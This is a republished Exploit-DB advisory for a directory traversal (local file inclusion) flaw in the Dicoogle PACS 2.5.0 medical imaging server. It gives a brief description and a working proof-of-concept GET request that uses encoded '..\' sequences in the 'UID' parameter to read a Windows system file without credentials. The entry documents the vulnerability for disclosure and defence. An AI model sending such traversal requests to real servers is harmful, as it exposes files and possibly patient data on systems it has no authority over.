Dicoogle PACS 2.5.0 – Directory Traversal

  • 作者: Carlos Avila
    日期: 2018-07-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45007/
  • # Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
    # Date: 2018-05-25
    # Software Link: http://www.dicoogle.com/home
    # Version: Dicoogle PACS 2.5.0-20171229_1522
    # Category: webapps
    # Tested on: Windows 2012 R2
    # Exploit Author: Carlos Avila
    # Contact: http://twitter.com/badboy_nt
    
    # 1. Description
    # Dicoogle is an open source medical imaging repository with an extensible
    # indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
    # to local file inclusion. This allows an attacker to read arbitrary files that the
    # web user has access to. Admin credentials aren't required. The ‘UID’ parameter
    # via GET is vulnerable.
    
    # 2. Proof of Concept
    
    http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini